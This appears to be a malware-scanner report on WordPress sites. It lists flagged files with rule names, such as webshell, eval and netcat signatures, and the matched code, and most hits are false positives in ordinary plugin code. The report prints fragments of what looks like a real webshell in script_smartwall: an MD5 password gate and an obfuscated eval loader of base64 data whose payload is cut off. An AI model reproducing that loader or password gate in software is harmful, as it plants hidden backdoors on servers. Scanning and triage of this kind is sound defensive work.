chr(0).chr(1).chr(2).chr(3).chr(4).chr(5).chr(6).chr(7).
| Exploit too_many_chr Line: 1072 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(10).chr(11).chr(12).chr(13).chr(14).chr(15).chr(16).chr(17).
| Exploit too_many_chr Line: 1073 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(20).chr(21).chr(22).chr(23).chr(24).chr(25).chr(26).chr(27).
|
|
//var/www/rostov/data/www/intim-rostova.ru/wp-content/plugins/ajax-search-pro/backend/search.php Size: 21.91 kB Created: 2021-02-14 22:45:16 Modified: 2021-02-15 08:42:07 Dangers: 1
|
//var/www/rostov/data/www/intim-rostova.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxonomy_term_select.class.php Size: 25.39 kB Created: 2021-02-14 22:45:16 Modified: 2021-02-15 08:42:07 Dangers: 1
|
//var/www/rostov/data/www/intim-rostova.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cf_search_callback.class.php Size: 6.03 kB Created: 2021-02-14 22:45:16 Modified: 2021-02-15 08:42:07 Dangers: 1
|
//var/www/rostov/data/www/intim-rostova.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_user_select.class.php Size: 8.51 kB Created: 2021-02-14 22:45:16 Modified: 2021-02-15 08:42:07 Dangers: 1
|
//var/www/rostov/data/www/intim-rostova.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxterm_search_callback.class.php Size: 5.94 kB Created: 2021-02-14 22:45:16 Modified: 2021-02-15 08:42:07 Dangers: 1
|
//var/www/rostov/data/www/intim-rostova.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/type.class.php Size: 5.81 kB Created: 2021-02-14 22:45:16 Modified: 2021-02-15 08:42:07 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 98 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$val['func']($this->newData)
|
|
//var/www/rostov/data/www/intim-rostova.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cpt_select.class.php Size: 7.36 kB Created: 2021-02-14 22:45:16 Modified: 2021-02-15 08:42:07 Dangers: 1
|
//var/www/rostov/data/www/intim-rostova.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/languageselect.class.php Size: 6.91 kB Created: 2021-02-14 22:45:16 Modified: 2021-02-15 08:42:07 Dangers: 1
| Description | Match |
|---|
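Function str_rot13 eval_str_rot13 Line: 177 Dangerous Encoded Function `eval` [https://www.php.net/eval]. The match is the bare four-letter string `riny` (the ROT13 form of `eval`); check that line 177 actually passes it to `str_rot13()`, because the same four letters can also occur inside ordinary words or data |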
riny
|
|
//var/www/rostov/data/www/intim-rostova.ru/script_smartwall/update.php Size: 9.06 kB Created: 2021-02-14 22:44:50 Modified: 2021-02-15 08:42:07 Warns: 1 Dangers: 1
| Description | Match |
|---|
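Exploit password_protection_md5 Line: 9 Warning MD5 password-protected file, a pattern typically used by web shells. The same hash literal is also matched at line 19 of script_smartwall/index.php in this report, which ties the two files together for triage |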
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 9 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/rostov/data/www/intim-rostova.ru/script_smartwall/index.php Size: 38.45 kB Created: 2021-02-14 22:44:50 Modified: 2021-02-15 08:42:07 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 19 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 19 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/rostov/data/www/intim-rostova.ru/script_smartwall/smartwall.php Size: 8.87 kB Created: 2021-02-14 22:44:50 Modified: 2021-02-15 08:42:07 Warns: 2 Dangers: 3
| Description | Match |
|---|
Exploit base64_long Line: 2 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
'bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxUAq2mWzWmlIBhaIFjWGnCWJQlSOEgDQJaBIIBYJdiDPGhLRCa83gK...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("return $r;");} eval('?>'.ETOHERlTjcnxEbfSJHvr('bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxU...
| Sign 11413268 Line: 2 Dangerous Malware Signature (hash: 11413268) |
eval('?>
| Sign 7f5d33bf Line: 2 Dangerous Malware Signature (hash: 7f5d33bf) |
Jhc2U2N
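| Sign d97f004d Line: 2 Dangerous Malware Signature (hash: d97f004d). The matched string below is the Base64 encoding of `gzinflate`, i.e. the name of a decompression function is stored in encoded form, which is consistent with the `eval` and long-Base64 findings reported for line 2 of this same file |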
Z3ppbmZsYXRl
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-admin/includes/class-wp-filesystem-direct.php Size: 16.63 kB Created: 2021-01-20 15:41:44 Modified: 2021-11-11 23:40:41 Warns: 1
| Description | Match |
|---|
Function posix_getpwuid Warning Potentially dangerous function `posix_getpwuid` [https://www.php.net/posix_getpwuid] |
posix_getpwuid( $owneruid ); return $ownerarray['name']; } public function getchmod( $file ) { return substr( decoct( @fileperms( $file ) ), -3 ); } public function group( $file ) { $gid = @filegroup( $file ); if ( ! $gid ) { return false; } if ( ! function_exists( 'posix_getgrgid' ) ) { return $gid; } $grouparray = posix_getgrgid( $gid ); return $grouparray['name']; } public function copy( $source, $destination, $overwrite = false, $mode = false ) { if ( ! $overwrite && $this->exists( $destinat...
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-admin/includes/class-pclzip.php Size: 196.76 kB Created: 2021-01-20 15:41:44 Modified: 2021-11-11 23:40:41 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2627 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2780 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3702 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3948 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5677 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-admin/includes/file.php Size: 94.99 kB Created: 2021-01-20 15:41:44 Modified: 2021-11-11 23:40:41 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 703 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$overrides['upload_error_handler'](&$file, $message )
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-admin/includes/class-wp-filesystem-ssh2.php Size: 21.96 kB Created: 2021-01-20 15:41:44 Modified: 2021-11-11 23:40:41 Warns: 1
| Description | Match |
|---|
Function posix_getpwuid Warning Potentially dangerous function `posix_getpwuid` [https://www.php.net/posix_getpwuid] |
posix_getpwuid( $owneruid ); return $ownerarray['name']; } public function getchmod( $file ) { return substr( decoct( @fileperms( $this->sftp_path( $file ) ) ), -3 ); } public function group( $file ) { $gid = @filegroup( $this->sftp_path( $file ) ); if ( ! $gid ) { return false; } if ( ! function_exists( 'posix_getgrgid' ) ) { return $gid; } $grouparray = posix_getgrgid( $gid ); return $grouparray['name']; } public function copy( $source, $destination, $overwrite = false, $mode = false ) { if ( ...
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-admin/includes/class-wp-debug-data.php Size: 44.38 kB Created: 2021-01-20 15:41:44 Modified: 2021-11-11 23:40:41 Warns: 1 Dangers: 3
| Description | Match |
|---|
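Exploit php_uname Line: 553 Dangerous RCE (Remote Code Execution) allows remote attackers to execute arbitrary commands or code on the target machine. `php_uname()` itself only returns operating-system information, and the excerpt in the next finding shows it being formatted into a server-architecture string, so this match alone does not demonstrate code execution |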
php_uname( 'm' )
| Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec( 'gs --version' ); if ( empty( $gs ) ) { $gs = $not_available; $gs_debug = 'not available'; } else { $gs_debug = $gs; } } else { $gs = __( 'Unable to determine if Ghostscript is installed' ); $gs_debug = 'unknown'; } $info['wp-media']['fields']['ghostscript_version'] = array( 'label' => __( 'Ghostscript version' ), 'value' => $gs, 'debug' => $gs_debug, ); if ( function_exists( 'php_uname' ) ) { $server_architecture = sprintf( '%s %s %s', php_uname( 's' ), php_uname( 'r' ), php_uname( 'm' ) ...
| Sign 471b95ee Line: 653 Dangerous Malware Signature (hash: 471b95ee) |
SUHOSIN
| Sign 471b95ee Line: 654 Dangerous Malware Signature (hash: 471b95ee) |
suhosin
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-includes/class-snoopy.php Size: 38.13 kB Created: 2021-01-20 15:41:51 Modified: 2021-11-11 23:40:41 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec( $this->curl_path . ' ' . $cmdline_params . ' ' . escapeshellarg( $URI ), $results, $return ); if($return) { $this->error = "Error: cURL could not retrieve the document, error $return."; return false; } $results = implode("\r\n",$results); $result_headers = file("$headerfile"); $this->_redirectaddr = false; unset($this->headers); for($currentHeader = 0; $currentHeader < count($result_headers); $currentHeader++) { if(preg_match("/^(Location: |URI: )/i",$result_headers[$currentHeader])) { pre...
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-includes/sodium_compat/src/File.php Size: 53.06 kB Created: 2021-01-20 15:41:50 Modified: 2021-11-11 23:40:41 Dangers: 1
| Description | Match |
|---|
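Sign d97f004d Line: 857 Dangerous Malware Signature (hash: d97f004d). The matched token is `ZEROBYTE` in a sodium_compat source file; libsodium-style constant names contain `ZEROBYTES`, so compare the file with the upstream sodium_compat release before acting on this match |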
ZEROBYTE
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-includes/sodium_compat/src/Crypto32.php Size: 39.90 kB Created: 2021-01-20 15:41:50 Modified: 2021-11-11 23:40:41 Dangers: 1
| Description | Match |
|---|
Sign d97f004d Line: 38 Dangerous Malware Signature (hash: d97f004d) |
ZEROBYTE
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-includes/sodium_compat/src/Crypto.php Size: 39.69 kB Created: 2021-01-20 15:41:50 Modified: 2021-11-11 23:40:41 Dangers: 1
| Description | Match |
|---|
Sign d97f004d Line: 38 Dangerous Malware Signature (hash: d97f004d) |
ZEROBYTE
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-includes/Text/Diff/Engine/shell.php Size: 5.25 kB Created: 2021-01-20 15:41:51 Modified: 2021-11-11 23:40:41 Warns: 2
| Description | Match |
|---|
Function assert Warning Potentially dangerous function `assert` [https://www.php.net/assert] |
assert('$match[1] - $from_line_no == $match[4] - $to_line_no'); array_push($edits, new Text_Diff_Op_copy( $this->_getLines($from_lines, $from_line_no, $match[1] - 1), $this->_getLines($to_lines, $to_line_no, $match[4] - 1))); } switch ($match[3]) { case 'd': array_push($edits, new Text_Diff_Op_delete( $this->_getLines($from_lines, $from_line_no, $match[2]))); $to_line_no++; break; case 'c': array_push($edits, new Text_Diff_Op_change( $this->_getLines($from_lines, $from_line_no, $match[2]), $this...
| Function shell_exec Warning Potentially dangerous function `shell_exec` [https://www.php.net/shell_exec] |
shell_exec($this->_diffCommand . ' ' . $from_file . ' ' . $to_file); unlink($from_file); unlink($to_file); if (is_null($diff)) { return array(new Text_Diff_Op_copy($from_lines)); } $from_line_no = 1; $to_line_no = 1; $edits = array(); preg_match_all('#^(\d+)(?:,(\d+))?([adc])(\d+)(?:,(\d+))?$#m', $diff, $matches, PREG_SET_ORDER); foreach ($matches as $match) { if (!isset($match[5])) { $match[5] = false; } if ($match[3] == 'a') { $from_line_no--; } if ($match[3] == 'd') { $to_line_no--; } if ($fr...
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-includes/Text/Diff/Engine/native.php Size: 15.94 kB Created: 2021-01-20 15:41:51 Modified: 2021-11-11 23:40:41 Warns: 1
| Description | Match |
|---|
Function assert Warning Potentially dangerous function `assert` [https://www.php.net/assert] |
assert($yi < $n_to || $this->xchanged[$xi]); assert($xi < $n_from || $this->ychanged[$yi]); $copy = array(); while ($xi < $n_from && $yi < $n_to && !$this->xchanged[$xi] && !$this->ychanged[$yi]) { $copy[] = $from_lines[$xi++]; ++$yi; } if ($copy) { $edits[] = new Text_Diff_Op_copy($copy); } $delete = array(); while ($xi < $n_from && $this->xchanged[$xi]) { $delete[] = $from_lines[$xi++]; } $add = array(); while ($yi < $n_to && $this->ychanged[$yi]) { $add[] = $to_lines[$yi++]; } if ($delete && ...
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-includes/Text/Diff.php Size: 13.14 kB Created: 2021-01-20 15:41:51 Modified: 2021-11-11 23:40:41 Warns: 1
| Description | Match |
|---|
Function assert Warning Potentially dangerous function `assert` [https://www.php.net/assert] |
assert(count($from_lines) == count($mapped_from_lines)); assert(count($to_lines) == count($mapped_to_lines)); parent::Text_Diff($mapped_from_lines, $mapped_to_lines); $xi = $yi = 0; for ($i = 0; $i < count($this->_edits); $i++) { $orig = &$this->_edits[$i]->orig; if (is_array($orig)) { $orig = array_slice($from_lines, $xi, count($orig)); $xi += count($orig); } $final = &$this->_edits[$i]->final; if (is_array($final)) { $final = array_slice($to_lines, $yi, count($final)); $yi += count($final); } ...
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-includes/class-requests.php Size: 30.05 kB Created: 2021-01-20 15:41:51 Modified: 2021-11-11 23:40:41 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 190 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$transport[$cap_string]()
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-includes/ID3/module.audio-video.quicktime.php Size: 140.10 kB Created: 2021-01-20 15:41:51 Modified: 2021-11-11 23:40:41 Dangers: 1
| Description | Match |
|---|
Function str_rot13 eval_str_rot13 Line: 1859 Dangerous Encoded Function `eval` [https://www.php.net/eval] |
riny
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-includes/SimplePie/Parse/Date.php Size: 20.20 kB Created: 2021-01-20 15:41:50 Modified: 2021-11-11 23:40:41 Warns: 1
| Description | Match |
|---|
Exploit concat_vars_with_spaces Line: 787 Warning Concatenation of vars technique is usually used for the obfuscation of malicious code |
$day . $fws . $month . $fws . $year . $fws .
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/profile-builder-pro/modules/user-listing/userlisting.php Size: 128.34 kB Created: 2021-04-21 15:27:36 Modified: 2021-11-11 23:40:41 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 1185 Warning Double var technique is usually used for the obfuscation of malicious code |
${$gloabl_filter_ids_name}
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/wordpress-seo-premium/premium/classes/redirect/redirect-validator.php Size: 4.80 kB Created: 2021-01-20 15:41:45 Modified: 2021-11-11 23:40:41 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 140 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$validation_rule['validation_class']()
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/wordpress-seo-premium/admin/tracking/class-tracking-server-data.php Size: 1.98 kB Created: 2021-01-20 15:41:45 Modified: 2021-11-11 23:40:41 Dangers: 1
| Description | Match |
|---|
Sign 963e968a Line: 39 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/wordpress-seo-premium/inc/sitemaps/class-sitemaps-cache-validator.php Size: 9.33 kB Created: 2021-01-20 15:41:45 Modified: 2021-11-11 23:40:41 Dangers: 1
| Description | Match |
|---|
Sign d30fc49e Line: 108 Dangerous Malware Signature (hash: d30fc49e) |
backdoor
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/wordpress-seo-premium/src/orm/yoast-orm-wrapper.php Size: 4.68 kB Created: 2021-01-20 15:41:45 Modified: 2021-11-11 23:40:41 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 95 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$repositories[ $table_name ]( $table_name, [], $connection_name )
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/wordpress-seo-premium/vendor_prefixed/guzzlehttp/guzzle/src/Handler/StreamHandler.php Size: 18.02 kB Created: 2021-01-20 15:41:45 Modified: 2021-11-11 23:40:41 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 83 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$options['on_headers']($response)
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/wordpress-seo-premium/vendor_prefixed/guzzlehttp/guzzle/src/Handler/MockHandler.php Size: 6.02 kB Created: 2021-01-20 15:41:45 Modified: 2021-11-11 23:40:41 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 69 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$options['on_headers']($response)
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/wordpress-seo-premium/vendor_prefixed/guzzlehttp/guzzle/src/HandlerStack.php Size: 7.76 kB Created: 2021-01-20 15:41:45 Modified: 2021-11-11 23:40:41 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 176 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$fn[0]($prev)
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/wordpress-seo-premium/vendor_prefixed/guzzlehttp/promises/src/Promise.php Size: 8.78 kB Created: 2021-01-20 15:41:45 Modified: 2021-11-11 23:40:41 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 164 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$handler[$index]($value)
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/wordpress-seo-premium/vendor_prefixed/ruckusing/lib/Ruckusing/Adapter/PgSQL/Base.php Size: 44.47 kB Created: 2021-01-20 15:41:45 Modified: 2021-11-11 23:40:41 Warns: 1
| Description | Match |
|---|
Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system($command); } public function table_exists($tbl, $reload_tables = \false) { $this->load_tables($reload_tables); return \array_key_exists($tbl, $this->_tables); } public function execute($query) { return $this->query($query); } public function query($query) { $this->logger->log($query); $query_type = $this->determine_query_type($query); $data = array(); if ($query_type == \YoastSEO_Vendor\SQL_SELECT || $query_type == \YoastSEO_Vendor\SQL_SHOW) { $res = \pg_query($this->conn, $query); if ($t...
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/wordpress-seo-premium/vendor_prefixed/ruckusing/lib/Ruckusing/Adapter/Sqlite3/Base.php Size: 27.06 kB Created: 2021-01-20 15:41:45 Modified: 2021-11-11 23:40:41 Warns: 1
| Description | Match |
|---|
Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system($command); } public function create_database($db, $options = array()) { $this->log_unsupported_feature(__FUNCTION__); return \true; } public function execute($query) { return $this->query($query); } public function quote_string($str) { return $this->sqlite3->escapeString($str); } public function database_exists($db) { $this->log_unsupported_feature(__FUNCTION__); return \true; } public function create_table($table_name, $options = array()) { return new \YoastSEO_Vendor\Ruckusing_Adapter_S...
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/OwnAssets.php Size: 44.62 kB Created: 2021-05-16 21:29:04 Modified: 2021-11-11 23:40:41 Warns: 1
| Description | Match |
|---|
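Function system Warning Potentially dangerous function `system` [https://www.php.net/system]. In the excerpt below `system (` appears to be an English word inside a translatable message string, not a call to PHP's `system()` |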
system (e.g. you are using the website for business purposes, to showcase your products and you are not using it as a blog where people leave comments to your posts).', 'wp-asset-clean-up')."\n\n". __('If you are not sure about whether activating this option is right or not, it is better to leave it as it is (to be loaded by default).', 'wp-asset-clean-up')."\n\n". __('Confirm this action to enable the unloading or cancel to leave it loaded by default.', 'wp-asset-clean-up'); $wpacuObjectData['r...
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/FontsGoogle.php Size: 23.64 kB Created: 2021-05-16 21:29:04 Modified: 2021-11-11 23:40:41 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 656 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/MinifyJs.php Size: 10.11 kB Created: 2021-05-16 21:29:04 Modified: 2021-11-11 23:40:41 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 137 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/Tools.php Size: 32.60 kB Created: 2021-05-16 21:29:04 Modified: 2021-11-11 23:40:41 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 328 Dangerous Malware Signature (hash: 471b95ee) |
suhosin
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/wp-asset-clean-up-pro/pro/classes/OptimiseAssets/OptimizeJsPro.php Size: 8.80 kB Created: 2021-05-16 21:29:04 Modified: 2021-11-11 23:40:41 Dangers: 2
| Description | Match |
|---|
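Exploit execution2 Dangerous RCE (Remote Code Execution) allows remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]. The excerpt below shows `array_filter()` called without a callback and `$_GET` used only in an `array_key_exists()` test, so review the full function before classing this as RCE |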
array_filter($allPatterns); } public static function isInlineJsEnabled() { $isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] && (trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled())); if (! $isEnabledInSettingsWithListOrAuto) { return false; } if (array_key_exists('wpacu_no_inline_js', $_GET)
| Exploit execution2 Line: 36 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
array_filter($allPatterns); }
/** * @return bool */ public static function isInlineJsEnabled() { $isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] && (trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled()));
if (! $isEnabledInSettingsWithListOrAuto) { return false; }
// Deactivate it for debugging purposes via query string /?wpacu_no_inline_js if (array_key_e...
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/wp-asset-clean-up-pro/templates/_admin-page-settings-plugin-areas/_fonts-google/_optimize-area.php Size: 13.93 kB Created: 2021-05-16 21:29:04 Modified: 2021-11-11 23:40:41 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 71 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/wp-asset-clean-up-pro/vendor/rawr/t-regx/src/SafeRegex/preg.php Size: 3.43 kB Created: 2021-05-16 21:29:04 Modified: 2021-11-11 23:40:41 Dangers: 1
| Description | Match |
|---|
Sign 696317c4 Line: 27 Dangerous Malware Signature (hash: 696317c4) |
@preg_replace
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/wp-asset-clean-up-pro/vendor/matthiasmullie/minify/src/JS.php Size: 38.32 kB Created: 2021-05-16 21:29:04 Modified: 2021-11-11 23:40:41 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec(', 'test(', 'toSource(', 'toString(', ); $delimiters = array_fill(0, count($propertiesAndMethods), '/'); $propertiesAndMethods = array_map('preg_quote', $propertiesAndMethods, $delimiters); $after = '(?=\s*([\.,;\)\}&\|+]|\/\/|$|\.('.implode('|', $propertiesAndMethods).')))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $callback); $before = '\)\s*'; $after = '(?=\s*\.('.implode('|', $propertiesAndMethods).'))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $c...
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Helper/HTML.php Size: 25.00 kB Created: 2021-01-20 15:41:46 Modified: 2021-11-11 23:40:41 Dangers: 1
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Reader/Excel5.php Size: 293.20 kB Created: 2021-01-20 15:41:46 Modified: 2021-11-11 23:40:41 Dangers: 1
| Description | Match |
|---|
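Exploit hacked_by Line: 7576 Dangerous Hacker credits (Triage note: this is a plain string match on "Hacked by" and can also fire on a developer comment that uses the phrase; read line 7576 before treating it as a defacement marker.) |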
Hacked by
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/File.php Size: 6.05 kB Created: 2021-01-20 15:41:46 Modified: 2021-11-11 23:40:41 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 176 Dangerous Malware Signature (hash: 471b95ee) |
Suhosin
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/PCLZip/pclzip.lib.php Size: 214.28 kB Created: 2021-01-20 15:41:46 Modified: 2021-11-11 23:40:41 Dangers: 5
| Description | Match |
|---|
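Exploit nano Line: 2454 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] (Triage note: the rule fires on a variable-function call; the expression matched here invokes whatever callback is stored under `PCLZIP_CB_PRE_ADD` in `$p_options`, so check where that option is set before classifying the file as a webshell. The same reading applies to the other `PCLZIP_CB_*` hits in this file.) |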
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2588 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3386 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3575 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5162 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
